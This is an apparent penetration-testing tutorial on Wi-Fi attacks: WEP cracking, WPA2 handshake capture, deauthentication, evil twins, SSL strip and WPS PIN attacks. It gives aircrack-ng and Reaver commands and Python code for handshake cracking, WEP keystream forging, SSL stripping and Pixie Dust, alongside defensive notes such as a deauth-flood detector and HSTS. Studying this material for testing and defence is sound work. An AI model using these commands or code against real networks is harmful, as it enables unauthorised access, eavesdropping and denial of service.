Wireless Access Point Attacks
A wireless access point (WAP) enables wireless devices to connect to a local network, typically using the Wi-Fi protocol. Because a WAP is an entry point into a network, and transmits data over the air to any receiver in range, it is a worthwhile target to dedicate testing resources to.
A WAP’s susceptibility to compromise usually depends on the strength of its security protocol. WAPs using the obsolete Wired Equivalent Privacy (WEP) scheme are especially vulnerable to intrusion. WEP encrypts each frame with the RC4 stream cipher keyed by a 24-bit initialization vector (IV) prepended to the shared key, and the IV is sent in the clear. The IV space is so small that on a busy network IVs start repeating after a few thousand frames, and a repeated IV means a repeated RC4 keystream. Capturing traffic with airodump-ng and feeding the capture file to aircrack-ng recovers the key statistically; the PTW attack it uses typically needs only tens of thousands of unique IVs, which takes minutes on a busy network. On a quiet network you can speed this up with aireplay-ng by injecting traffic: spoof the MAC address of a client associated with the WAP, capture one of its ARP requests, and replay it so the WAP answers with a stream of freshly encrypted frames, each carrying a new IV.
Most Wi-Fi networks today use WPA2 (and increasingly WPA3), which replaced WEP’s per-frame RC4 keying with session keys derived from a passphrase and a four-way handshake, so this class of attack no longer applies. Cracking a WPA/WPA2 pre-shared key is considerably more difficult. If you capture the four-way handshake, you can run dictionary and brute force attacks against it offline, but each guess costs 4,096 iterations of PBKDF2-HMAC-SHA1, and a long random passphrase is out of reach no matter how much hardware you have. Online guessing against the WAP itself is slower still and is easily blocked by a lockout that triggers after a certain number of failed attempts.
There are a number of good tools you can use to attack wireless access points and their clients. Here are a few examples:
- The Aircrack-ng suite (airmon-ng, airodump-ng, aireplay-ng, aircrack-ng, and many others)—a complete set of tools for wireless monitoring, attacking, testing, and cracking
- Kismet—a wireless sniffer, network detector, and intrusion detection system
- Wifite—a customizable tool you can use to attack WEP, WPA, and WPS
- WiFi-Pumpkin—create an evil twin/conduct a man-in-the-middle attack
- WiFi Pineapple—simplifies wireless man-in-the-middle attacks
Wireless Sniffing and Eavesdropping
As with a wired network, you can use a sniffer like Wireshark to capture wireless transmissions as they traverse the air. Once associated with a network, your wireless interface receives only frames addressed to its own MAC address or to broadcast and multicast addresses; the driver discards everything else. On a wired NIC, promiscuous mode lifts that filter, but on Wi-Fi promiscuous mode is not enough: you still see only data frames on the network you joined, and the driver hides the 802.11 management and control frames. To capture everything, put the interface in monitor mode (for example, airmon-ng start wlan0, which creates a wlan0mon interface). In monitor mode the interface passes every 802.11 frame it hears on the channel it is tuned to, whether or not the frame is addressed to you and whether or not you are associated with the network, so you can capture all traffic within range on that channel (airodump-ng hops between channels unless you pin it to one with -c).
By sniffing traffic, you may be able to eavesdrop on communications between client and AP. This is far more likely on public, open Wi-Fi networks that use no encryption. On encrypted networks, the data frames you receive are indecipherable without the network’s key, and with WPA2 even the key is not enough unless you also captured the client’s four-way handshake, since each client’s session keys are derived from it. Nevertheless, even in encrypted modes, the 802.11 headers and management frames are sent in cleartext: client and AP MAC addresses, SSIDs in beacons and probe requests, and the association and deauthentication exchanges. You can use this to your advantage in spoofing attacks.
Even in environments that use WPA/WPA2, you can launch a deauthentication attack to capture the four-way EAPOL handshake (used by both TKIP and CCMP/AES) that a client performs when it joins the network. The disconnected client must repeat the handshake to reconnect to the AP. Note that the pre-shared key (PSK) is never transmitted in this handshake. What you capture are the two nonces (ANonce and SNonce), the two MAC addresses, and a message integrity code (MIC) that the client computes with a key derived from the PSK. That is enough for an offline attack: for each candidate passphrase you derive the PMK (PBKDF2 over the SSID), derive the PTK from it together with the captured nonces and addresses, recompute the MIC, and compare it with the captured one. A match reveals the passphrase.
You can use airodump-ng to sniff for the handshake:
airodump-ng -c <channel> --bssid <MAC address> -w capture wlan0
Then use aireplay-ng (see the deauthentication section below) to knock a client off so that it reconnects. airodump-ng shows “WPA handshake: <MAC address>” in its status line once the exchange has been captured, and the resulting .cap file can be passed to aircrack-ng together with a wordlist.
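The following is an added example, not code from the page or from the aircrack-ng project, showing exactly what the offline WPA2-PSK attack computes once the handshake is captured: the PMK from the passphrase, the PTK from the PMK plus the captured nonces and addresses, and the EAPOL MIC that is compared against the sniffed one. The SSID, MAC addresses, nonces and EAPOL frame are constructed stand-ins for the values a real capture provides; the key derivation and MIC functions follow 802.11i.

```python
import hashlib
import hmac

# Constructed handshake parameters (stand-ins for what airodump-ng captures).
SSID = b"CorpWiFi"
AP_MAC = bytes.fromhex("00112233aabb")   # authenticator address (AA)
STA_MAC = bytes.fromhex("66778899ccdd")  # supplicant address (SPA)
ANONCE = bytes(range(32))                # from message 1 of the handshake
SNONCE = bytes(range(32, 64))            # from message 2


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """802.11i PSK mode: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes).
    The 4,096 iterations are what make every offline guess relatively slow."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i: HMAC-SHA1 in counter mode over the label
    'Pairwise key expansion' and the sorted MAC addresses and nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for counter in range(4):
        msg = b"Pairwise key expansion" + b"\x00" + data + bytes([counter])
        out += hmac.new(pmk, msg, hashlib.sha1).digest()
    return out[:64]  # KCK = [:16], KEK = [16:32], TK = [32:48]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame)[:16],
    computed over the EAPOL-Key frame with its MIC field zeroed."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 (client -> AP) with the MIC field zeroed.
    Fields: descriptor type, key info (pairwise, MIC bit, version 2), key length,
    replay counter, SNonce, key IV, RSC, reserved, MIC, key data length."""
    body = (b"\x02" + (0x010A).to_bytes(2, "big") + b"\x00\x10"
            + (1).to_bytes(8, "big") + snonce + bytes(16) + bytes(8) + bytes(8)
            + bytes(16) + b"\x00\x00")
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v2, EAPOL-Key


def capture_handshake(true_passphrase: str) -> dict:
    """Simulates the client side so we get the values a sniffer would see.
    Note what is absent from the result: the passphrase, the PMK and the PTK."""
    frame = build_eapol_msg2(SNONCE)
    ptk = ptk_from_pmk(pmk_from_passphrase(true_passphrase, SSID),
                       AP_MAC, STA_MAC, ANONCE, SNONCE)
    return {"ssid": SSID, "aa": AP_MAC, "spa": STA_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": frame, "mic": eapol_mic(ptk[:16], frame)}


def crack_handshake(hs: dict, wordlist):
    """Offline dictionary attack: derive PMK and PTK for each guess and check
    whether the recomputed MIC matches the captured one."""
    for guess in wordlist:
        pmk = pmk_from_passphrase(guess, hs["ssid"])
        ptk = ptk_from_pmk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol"]), hs["mic"]):
            return guess
    return None


if __name__ == "__main__":
    hs = capture_handshake("correct horse")
    print(crack_handshake(hs, ["password", "letmein", "correct horse"]))
```

Every candidate costs one PBKDF2 run, which is why wordlist quality matters more than hardware and why a random 20-character passphrase is not crackable this way.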
Replay attacks, also known as repeating attacks, repeat a legitimate transmission in a malicious context. For example, a user might send their authentication information to a client or system; an attacker who eavesdrops on this communication can resend it later, essentially impersonating the victim. In wireless networking, replaying transmissions enables several different attacks, including the WEP cracking process mentioned previously. WEP has no replay protection, so an attacker who captures one client’s encrypted ARP request can retransmit it thousands of times using the client’s spoofed MAC address, and the AP will rebroadcast each copy encrypted under a fresh IV, quickly producing the volume of IVs that key recovery needs.
Note: Do not confuse a replay attack with a relay attack. In a replay attack, a legitimate network packet or frame is retransmitted repeatedly. In a relay attack, an attacker inserts themselves man-in-the-middle style between two devices, intercepting and forwarding traffic between them.
A fragmentation attack recovers RC4 keystream, the output of the cipher’s pseudorandom generation algorithm (PRGA), for a WEP network without knowing the key. With enough keystream for one IV you can encrypt any packet you like under that IV and inject it into the access point, which speeds up cracking considerably, since otherwise it might take a long time for the network to produce enough IVs on its own.
The attack starts from a single captured data frame. Every WEP data frame’s plaintext begins with an 8-byte LLC/SNAP header whose contents are predictable, so XORing those 8 ciphertext bytes with the known header yields the first 8 bytes of keystream for that frame’s IV. That is enough to encrypt a tiny fragment (4 bytes of payload plus the 4-byte ICV), and 802.11 allows a packet to be sent as up to 16 fragments. You send a chosen packet as fragments, the AP reassembles it and re-encrypts the whole packet under an IV of its own, and because you know the plaintext you recover as much keystream as the reassembled packet is long. Repeating this with larger fragments yields around 1500 bytes of keystream, a full frame’s worth, after a few rounds, at which point you can use a packet crafting tool to begin the injection process.
The following is an example of using the aircrack-ng tool suite (specifically, aireplay-ng) to perform a fragmentation attack:
aireplay-ng -5 -b <AP MAC address> -h <source MAC address> wlan0
The -5 flag tells aireplay-ng to perform a fragmentation attack. Once you run the command, it prompts you to select a captured packet to use. The tool then sends fragmented packets, recovers keystream from the AP’s relayed frames, and repeats the process until it has 1500 bytes of PRGA output, which it saves to a fragment-*.xor file.
Next, you’re ready to craft a packet using a tool like packetforge-ng:
packetforge-ng -0 -a <AP MAC address> -h <source MAC address> -k 255.255.255.255 -l 255.255.255.255 -y <saved PRGA file> -w <crafted packet output>
This tells the tool to craft an ARP request (-0) with the given destination (-k) and source (-l) IP addresses, encrypt it with the PRGA keystream you recovered (-y), and save the resulting frame to a file (-w). A broadcast ARP request is the usual choice because the AP will rebroadcast it to all clients, with a new IV each time. You can then inject your crafted packet into the AP like so:
aireplay-ng -2 -r <crafted packet output> wlan0
The -2 flag selects interactive packet replay, and -r reads the packet to replay from the file. Confirm the packet when prompted and aireplay-ng sends it over and over; if the AP accepts it, the #Data column in airodump-ng climbs rapidly and you will soon have enough IVs to crack the WEP key with aircrack-ng.
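The following is an added example, not code from the page or the aircrack-ng suite, that models in miniature both the WEP weaknesses described above (a repeated IV reusing RC4 keystream, and the 8 known LLC/SNAP bytes seeding a fragmentation attack) and what packetforge-ng then does with the recovered keystream. The WEP key, IVs and frames are constructed here, and ModelAP stands in for the real access point’s reassemble-and-relay behaviour; RC4, the ICV and the frame layout follow the WEP specification.

```python
import math
import zlib

LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")  # predictable first 8 plaintext bytes of an ARP frame


def rc4(key: bytes, length: int) -> bytes:
    """RC4 key scheduling followed by the PRGA; returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: CRC-32, little-endian, appended before encryption."""
    return zlib.crc32(plaintext).to_bytes(4, "little")


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV (clear) || RC4(IV || key) XOR (plaintext || ICV)."""
    data = plaintext + icv(plaintext)
    return iv + xor(data, rc4(iv + key, len(data)))


def wep_decrypt(key: bytes, frame: bytes):
    """Returns (plaintext, icv_ok); only the AP model below knows the key."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4(iv + key, len(body)))
    return data[:-4], icv(data[:-4]) == data[-4:]


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Keystream = ciphertext XOR known plaintext, for as many bytes as are known."""
    return xor(frame[3:], known_plaintext)


def forge_frame(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """What packetforge-ng does: encrypt a chosen packet with captured PRGA output."""
    data = plaintext + icv(plaintext)
    if len(keystream) < len(data):
        raise ValueError("need keystream for packet plus 4-byte ICV")
    return iv + xor(data, keystream)


def iv_collision_bound(iv_bits: int = 24) -> float:
    """Birthday estimate of frames until the first repeated IV (about 5,100 for WEP)."""
    return math.sqrt(math.pi / 2 * 2 ** iv_bits)


class ModelAP:
    """Stand-in for the access point: decrypts fragments, drops any with a bad
    ICV, reassembles, and relays the packet under a fresh IV of its own."""
    def __init__(self, key: bytes):
        self.key, self.iv_counter = key, 0

    def relay(self, fragments):
        plaintext = b""
        for frag in fragments:
            part, ok = wep_decrypt(self.key, frag)
            if not ok:
                return None
            plaintext += part
        self.iv_counter += 1
        return wep_encrypt(self.key, self.iv_counter.to_bytes(3, "big"), plaintext)


def fragmentation_attack(ap: ModelAP, captured_frame: bytes, target: int = 1500):
    """Bootstrap from 8 known keystream bytes to a full frame's worth. Each round
    sends up to 16 fragments that the keystream we hold can encrypt; the AP's
    relayed copy (known plaintext, new IV) yields longer keystream."""
    iv = captured_frame[:3]
    keystream = recover_keystream(captured_frame, LLC_SNAP_ARP)  # 8 bytes
    while len(keystream) < target + 4:
        chunk = len(keystream) - 4          # payload bytes per fragment
        want = min(16 * chunk, target)
        chosen = bytes(i & 0xFF for i in range(want))
        frags = [forge_frame(iv, keystream, chosen[i:i + chunk]) for i in range(0, want, chunk)]
        relayed = ap.relay(frags)
        iv, keystream = relayed[:3], recover_keystream(relayed, chosen + icv(chosen))
    return iv, keystream


def demo():
    """Sniff one client ARP, run the attack, forge our own ARP with no key."""
    key = bytes.fromhex("0123456789")                        # constructed 40-bit WEP key
    ap = ModelAP(key)
    sniffed = wep_encrypt(key, bytes.fromhex("a1b2c3"), LLC_SNAP_ARP + bytes(28))
    iv, keystream = fragmentation_attack(ap, sniffed)
    forged = forge_frame(iv, keystream, LLC_SNAP_ARP + bytes(28))
    return len(keystream), wep_decrypt(key, forged)[1]
```

The rounds grow as 8, 68, 1028 and then 1504 bytes of keystream, matching the handful of rounds aireplay-ng -5 needs; the forged frame passes the AP’s ICV check even though the attacker never learned the key.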
Jamming is an attack in which radio waves disrupt Wi-Fi signals. Wi-Fi itself uses radio waves for communication and is therefore susceptible to being jammed by devices that broadcast noisy signals on the same frequency. These signals override any other wireless signals that a wireless receiver is attempting to pick up on. By jamming a Wi-Fi signal, you can trigger a denial of service (DoS) and disrupt the flow of communications.
Physical jamming devices can send these disruptive signals to wireless receivers in a targeted area. However, such devices are illegal in many jurisdictions, including the whole United States. You should consider the legality of radio jamming in your area before performing it as part of a test.
Although not exactly “jamming” in the sense of physically disrupting radio transmissions, some in the industry use the term jamming to refer to a disruption of wireless communications that breaks the link between client and access point. This is called deauthentication, and you can use it to knock a client off a network and prevent it from sending and receiving communications. For example, wifijammer is a Python script that can disrupt all WAPs in an area, limited only by the range of your wireless interface. You can also use wifijammer for more targeted attacks that disable only select Wi-Fi networks in an area, or even specific clients.
Deauthentication is possible because the 802.11 protocol includes a management frame that either a client or an access point can send to announce that it is terminating the association. Management frames are neither encrypted nor authenticated unless the network uses 802.11w Protected Management Frames (mandatory in WPA3, optional in WPA2), so nothing stops you from forging them. You can spoof the victim’s MAC address and send a deauthentication frame to the access point, or spoof the access point’s MAC address and send one to the client; either way the recipient tears down the connection. Tools such as aireplay-ng send both.
Other than simple denial of service, deauthentication attacks are used in service of evil twin attacks, replay attacks, cracking attacks, and more. They have even been used by public businesses like hotels to force customers to stop using personal hotspots and start paying for the hotel’s own Wi-Fi service (the FCC fined a hotel operator for this in 2014). Ultimately, a deauthentication attack can be a powerful technique for accomplishing a number of different malicious objectives.
There are several tools that can perform deauthentication. The following is an example of using aireplay-ng to deauthenticate all clients on a WAP:
aireplay-ng -0 1 -a <MAC address> wlan0
The -0 1 flag tells the tool to send one round of deauthentication frames (use 0 for an endless stream; each round is a burst of frames to the client and to the AP). With -a you specify the MAC address (BSSID) of the targeted access point; without a client address the frames go to the broadcast address and most clients disconnect. Add -c with a client’s MAC address to knock only that client off the WAP instead of every client. The interface must be in monitor mode and tuned to the AP’s channel.
Other than software tools, a hardware tool like WiFi Pineapple can launch deauthentication attacks.
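The following is an added example, not code from the page or from any of the tools it names, that builds the 802.11 deauthentication frame described above byte by byte, parses it back, and shows the detection side: a simple wireless IDS rule that flags a deauth flood of the kind aireplay-ng -0 produces. The BSSID, client address and capture are constructed; the frame layout follows the 802.11 management frame format. Transmitting such a frame needs a monitor-mode interface and is outside this example.

```python
import struct
from collections import defaultdict

FC_DEAUTH = 0x00C0  # frame control: version 0, type 0 (management), subtype 12
REASON_CLASS3_FROM_NONASSOC = 7  # reason code aireplay-ng uses by default

AP = "00:11:22:33:aa:bb"       # constructed BSSID
CLIENT = "66:77:88:99:cc:dd"   # constructed victim


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(dst: str, src: str, bssid: str, reason: int = REASON_CLASS3_FROM_NONASSOC, seq: int = 0) -> bytes:
    """802.11 deauthentication frame, 26 bytes before the FCS: frame control,
    duration, addr1 (receiver), addr2 (transmitter), addr3 (BSSID), sequence
    control, reason code. Nothing here is authenticated unless 802.11w is in
    use, so src and bssid are free to forge."""
    header = struct.pack("<HH6s6s6sH", FC_DEAUTH, 0x013A,
                         mac_bytes(dst), mac_bytes(src), mac_bytes(bssid), seq << 4)
    return header + struct.pack("<H", reason)


def parse_frame(raw: bytes) -> dict:
    """Decode the generic 802.11 MAC header plus the deauth reason code."""
    fc, _dur, a1, a2, a3, seqctl = struct.unpack_from("<HH6s6s6sH", raw, 0)
    info = {"type": (fc >> 2) & 0x3, "subtype": (fc >> 4) & 0xF,
            "addr1": mac_str(a1), "addr2": mac_str(a2), "addr3": mac_str(a3),
            "seq": seqctl >> 4}
    if info["type"] == 0 and info["subtype"] == 12:
        info["reason"] = struct.unpack_from("<H", raw, 24)[0]
    return info


def detect_deauth_flood(frames, window_s: float = 1.0, threshold: int = 10):
    """Wireless IDS rule: flag (bssid, receiver) pairs that see more than
    `threshold` deauth frames inside any sliding window of `window_s` seconds.
    `frames` is an iterable of (timestamp_seconds, raw_frame)."""
    seen = defaultdict(list)
    for ts, raw in frames:
        f = parse_frame(raw)
        if f["type"] == 0 and f["subtype"] == 12:
            seen[(f["addr3"], f["addr1"])].append(ts)
    alerts = []
    for key, times in seen.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window_s:
                start += 1
            if end - start + 1 > threshold:
                alerts.append(key)
                break
    return alerts


def sample_capture():
    """Constructed capture: one ordinary deauth (an AP going down, reason 3,
    to broadcast) followed by an aireplay-ng style burst of 64 forged frames
    aimed at one client, all claiming to come from the AP."""
    frames = [(0.0, build_deauth("ff:ff:ff:ff:ff:ff", AP, AP, reason=3))]
    frames += [(5.0 + i * 0.002, build_deauth(CLIENT, AP, AP, seq=i)) for i in range(64)]
    return frames


if __name__ == "__main__":
    print(detect_deauth_flood(sample_capture()))
```

A single deauth is normal traffic; dozens per second to one receiver, or a sequence number that jumps around because the forger is not the real AP, is what a monitoring sensor should alert on.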
Evil Twin Attacks
An evil twin is a rogue access point that attempts to deceive users into believing that it is a legitimate access point, like the organization’s official Wi-Fi network. Evil twins are therefore a form of social engineering, as the attacker is trying to trick users into connecting to the attacker’s network. This is often facilitated through a deauthentication attack—if the attacker can knock a client off the network, they may be able to trick them into reconnecting to the rogue AP. Once the user does so, the attacker can launch all manner of attacks against the victim. For example, they might set up a convincing captive portal with a login form to harvest users’ credentials.
Evil twin attacks are effective because it’s not always easy for a user to tell the real Wi-Fi network from the fake. Both networks can have the same SSID, making it even harder. Certain factors make the evil twin more effective, such as using the same (or expected) security protocol and placing it close to the targeted user(s) so that its signal is strong and it sorts to the top of the client’s list of APs. However, offering an encrypted network requires the rogue AP to know the victims’ password, which the attacker usually does not, so evil twins typically operate in open mode. The caveat is that modern clients remember a saved network together with its security type, so a device will generally not auto-join an open network just because its name matches a saved WPA2 one; the attacker then relies on the user joining manually.
There are also specific attacks that leverage the evil twin technique to make it more effective or useful. Some devices, especially those running older operating systems, send active probe requests naming the networks they remember rather than waiting passively for an AP’s beacon frames. An attacker listening for such a request can answer with a rogue AP carrying that SSID and the client will connect. The legitimate AP doesn’t need to be nearby, since the client believes it is joining a network it already trusts, and the attacker doesn’t need to broadcast a spoofed SSID that might raise suspicion. This is called a Karma attack. Current operating systems mostly stop broadcasting saved SSIDs in probe requests, which limits it to older or misconfigured clients.
Other significant attacks that pair well with an evil twin are the downgrade attack and the SSL strip attack. In both, the victim tries to reach a website that normally uses HTTPS, with the attacker sitting between client and server. With an evil twin the attacker already is the victim’s gateway; on a network the attacker does not control, the same position is usually gained through ARP poisoning. In both attacks the attacker’s machine maintains two separate connections, one with the server and one with the client. The connection to the server uses normal HTTPS. The connection to the client uses either a weaker or older SSL/TLS version and cipher suite that the attacker can break or forge (downgrade attack), or no encryption at all, plain HTTP (SSL strip attack). The client and website both believe they are talking directly to each other, while in reality their communications are relayed through the attacker, who harvests credentials and other interesting data along the way.
The two attacks differ in what the user sees. A downgrade attack that terminates TLS on the attacker’s machine must present the browser with a certificate, and since the attacker cannot obtain one legitimately issued for the victim’s site, it is a self-signed or otherwise untrusted certificate. The browser detects this and warns the user, and the attack succeeds only because many users, not knowing or caring what the warning means, click through it. SSL strip avoids the warning entirely: the client is never offered a certificate, it simply receives an http:// page and a missing padlock icon, with links and redirects rewritten so that it never asks for https://. Browsers defeat this with HTTP Strict Transport Security (HSTS): a site the browser has already seen send a Strict-Transport-Security header, or that is on the browser’s preload list, is requested over HTTPS before any plaintext leaves the machine, and an attacker who then presents a bad certificate triggers an error the user cannot click through. On the defensive side, certificates that are untrusted display a red circle with an X in their properties; the break in trust can occur anywhere in the certification path, including at the root level, and untrusted certificates should be replaced by ones from a trusted source.
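The following is an added example, not code from the page or from the sslstrip tool, that models the SSL strip rewriting step described above and the HSTS check that defeats it. The proxy class rewrites https:// redirects and links to http://, drops the Strict-Transport-Security header so the client never learns to insist on HTTPS, and remembers which URLs it stripped so it can fetch them from the real server over HTTPS; the Browser class is a constructed stand-in for the client’s HSTS cache. The host names and responses are made up for illustration.

```python
import re

HSTS_HEADER = "strict-transport-security"
HTTPS_LINK = re.compile(r"https://([^\s\"'<>]+)")


class SslStripProxy:
    """Sits between an HTTP client and an HTTPS server and keeps the client side plain."""

    def __init__(self):
        self.stripped_urls = set()   # http:// URLs the client now uses that were https://

    def rewrite_response(self, status: int, headers: dict, body: str):
        """Rewrite one server response before relaying it to the client."""
        headers = {k.lower(): v for k, v in headers.items()}
        headers.pop(HSTS_HEADER, None)                    # never let the browser learn HSTS
        if headers.get("location", "").startswith("https://"):
            headers["location"] = "http://" + headers["location"][len("https://"):]
            self.stripped_urls.add(headers["location"])
        if "set-cookie" in headers:                       # cookies marked Secure would not
            headers["set-cookie"] = re.sub(r";\s*Secure", "", headers["set-cookie"],
                                           flags=re.IGNORECASE)  # be sent over plain http

        def swap(match):
            url = "http://" + match.group(1)
            self.stripped_urls.add(url)
            return url

        return status, headers, HTTPS_LINK.sub(swap, body)

    def upstream_url(self, client_url: str) -> str:
        """The client asked for http://...; fetch it over https if we stripped it."""
        if client_url in self.stripped_urls:
            return "https://" + client_url[len("http://"):]
        return client_url


class Browser:
    """Constructed client model: an HSTS cache. A host learned earlier over a clean
    connection (or preloaded) is upgraded before any request leaves, so the
    proxy never sees plaintext for it."""

    def __init__(self, hsts_hosts=()):
        self.hsts = set(hsts_hosts)

    def navigate(self, url: str) -> str:
        host = url.split("/")[2]
        if url.startswith("http://") and host in self.hsts:
            return "https://" + url[len("http://"):]
        return url
```

The attack works only against a client that starts from plain HTTP and has no HSTS entry for the site, which is why sites should send HSTS with a long max-age and submit themselves for preloading.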
There are two main cracking attacks that exploit weaknesses in Wi-Fi Protected Setup (WPS), a feature meant to streamline setting up a secure Wi-Fi network and enrolling devices in it. The most prominent attack brute forces the 8-digit PIN that clients can use to enroll without knowing the WPA/WPA2 PSK. The flaw is in how the PIN is verified: the AP reports after message M4 of the exchange whether the first four digits were right, and only afterwards, after M6, whether the last four were, so the two halves can be guessed independently. The eighth digit is also a checksum of the other seven. An attacker therefore needs at most 10,000 guesses for the first half plus 1,000 for the second, about 11,000 in total instead of the 10,000,000 a seven-digit secret would otherwise require. That is a matter of hours, assuming the WAP doesn’t lock out after a certain number of failures. Even if it does, the attack may take a couple of weeks instead of a couple of hours, still short enough to be feasible. The lockout may also be keyed on the client’s MAC address, so spoofing your MAC may get around it. Some simpler WAPs cannot even keep up with a brute force attack and suffer a DoS condition as a result.
Online brute forcing is not your only option, however. An offline attack called Pixie Dust can recover the WPS PIN within minutes. In the WPS exchange the AP (acting as the enrollee) proves knowledge of the PIN by sending two hashes, E-Hash1 and E-Hash2, in message M3: each is an HMAC-SHA256 over a secret 128-bit nonce (E-S1 or E-S2), a value derived from one half of the PIN, and the two Diffie-Hellman public keys exchanged earlier. The attacker, acting as the registrar, already knows the public keys and the HMAC key, so the only unknowns are the PIN halves and the nonces. The problem is that some chipset vendors generated E-S1 and E-S2 with weak, predictable random number generators, and some used all-zero nonces. With the hashes captured and the nonces known or guessable, you can try all 10,000 first halves against E-Hash1 and then all 1,000 second halves against E-Hash2 entirely offline, without sending anything further to the AP. A match reveals the PIN.
You can use a Kali Linux tool called Reaver to launch a Pixie Dust attack:
reaver -i wlan0 -b <AP MAC address> -c <AP channel> -K 1
The -K 1 flag tells Reaver to run the Pixie Dust attack (using pixiewps), which exploits the known weak nonce generation of Ralink, Broadcom, and Realtek chipsets. The interface should be in monitor mode.
Newer Reaver versions can also attempt a null PIN (-p ""), which some APs accept; if it succeeds, Reaver reports the PIN but may not return the WPA passphrase. After updating Reaver you can also set the no-NACKs (-N) option, which helps against APs that send spurious NACK messages, and -vv for verbose output. Example:
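The following is an added example, not code from the page or from Reaver or pixiewps, that makes the two WPS attacks concrete: the PIN checksum, the half-by-half online search against a constructed AP model (with and without a lockout), and the offline Pixie Dust recovery from E-Hash1/E-Hash2 when the nonces are all zero. The AuthKey, Diffie-Hellman public keys and nonces are constructed stand-ins; the PSK1/PSK2 and E-Hash derivations follow the WPS specification.

```python
import hashlib
import hmac


def wps_checksum(first_seven: int) -> int:
    """Eighth PIN digit: the WPS checksum over the first seven (Luhn-style)."""
    acc, pin = 0, first_seven
    while pin:
        acc += 3 * (pin % 10)
        pin //= 10
        acc += pin % 10
        pin //= 10
    return (10 - acc % 10) % 10


def pin_valid(pin8: str) -> bool:
    return len(pin8) == 8 and pin8.isdigit() and int(pin8[7]) == wps_checksum(int(pin8[:7]))


class ModelWpsAP:
    """Constructed AP model of the registration exchange. The split response is
    the bug: a wrong first half is reported after M4, a wrong second half only
    after M6, so the two halves can be guessed independently."""

    def __init__(self, pin8: str, lockout_after=None):
        self.pin, self.attempts, self.lockout_after = pin8, 0, lockout_after

    def try_pin(self, pin8: str) -> str:
        self.attempts += 1
        if self.lockout_after and self.attempts > self.lockout_after:
            return "LOCKED"
        if pin8[:4] != self.pin[:4]:
            return "NACK_M4"
        if pin8[4:] != self.pin[4:]:
            return "NACK_M6"
        return "OK"


def online_bruteforce(ap: ModelWpsAP):
    """Reaver's strategy: up to 10,000 first halves, then up to 1,000 second
    halves with the checksum digit filled in. Returns (pin, attempts)."""
    attempts, first = 0, None
    for a in range(10_000):
        attempts += 1
        r = ap.try_pin(f"{a:04d}0000")
        if r == "LOCKED":
            return None, attempts
        if r != "NACK_M4":          # NACK_M6 or OK: first half confirmed
            first = f"{a:04d}"
            break
    if first is None:
        return None, attempts
    for b in range(1_000):
        attempts += 1
        pin = first + f"{b:03d}" + str(wps_checksum(int(first + f"{b:03d}")))
        r = ap.try_pin(pin)
        if r == "LOCKED":
            return None, attempts
        if r == "OK":
            return pin, attempts
    return None, attempts


def psk_half(authkey: bytes, half: str) -> bytes:
    """PSK1/PSK2 = first 128 bits of HMAC-SHA256(AuthKey, PIN half as ASCII)."""
    return hmac.new(authkey, half.encode(), hashlib.sha256).digest()[:16]


def e_hash(authkey: bytes, es: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    """E-Hash1/2 = HMAC-SHA256(AuthKey, E-S || PSK || PKE || PKR), sent by the AP in M3."""
    return hmac.new(authkey, es + psk + pke + pkr, hashlib.sha256).digest()


def m3_from_ap(authkey, pke, pkr, es1, es2, pin8):
    """What the attacker (acting as registrar) receives: both hashes. AuthKey,
    PKE and PKR are known to the registrar; E-S1/E-S2 are supposed to be secret."""
    return (e_hash(authkey, es1, psk_half(authkey, pin8[:4]), pke, pkr),
            e_hash(authkey, es2, psk_half(authkey, pin8[4:]), pke, pkr))


def pixie_dust(authkey, pke, pkr, eh1, eh2, es1, es2):
    """Offline recovery once E-S1/E-S2 are known or guessable (e.g. all zero):
    at most 10,000 + 1,000 HMACs and no further traffic to the AP."""
    first = next((f"{a:04d}" for a in range(10_000)
                  if e_hash(authkey, es1, psk_half(authkey, f"{a:04d}"), pke, pkr) == eh1), None)
    if first is None:
        return None
    for b in range(1_000):
        second = f"{b:03d}" + str(wps_checksum(int(first + f"{b:03d}")))
        if e_hash(authkey, es2, psk_half(authkey, second), pke, pkr) == eh2:
            return first + second
    return None


# Constructed values: a 32-byte AuthKey, 192-byte DH public keys, and the
# all-zero 128-bit nonces that some chipsets were found to use.
AUTHKEY = bytes(range(32))
PKE, PKR = bytes([0x11]) * 192, bytes([0x22]) * 192
WEAK_ES1 = WEAK_ES2 = bytes(16)
```

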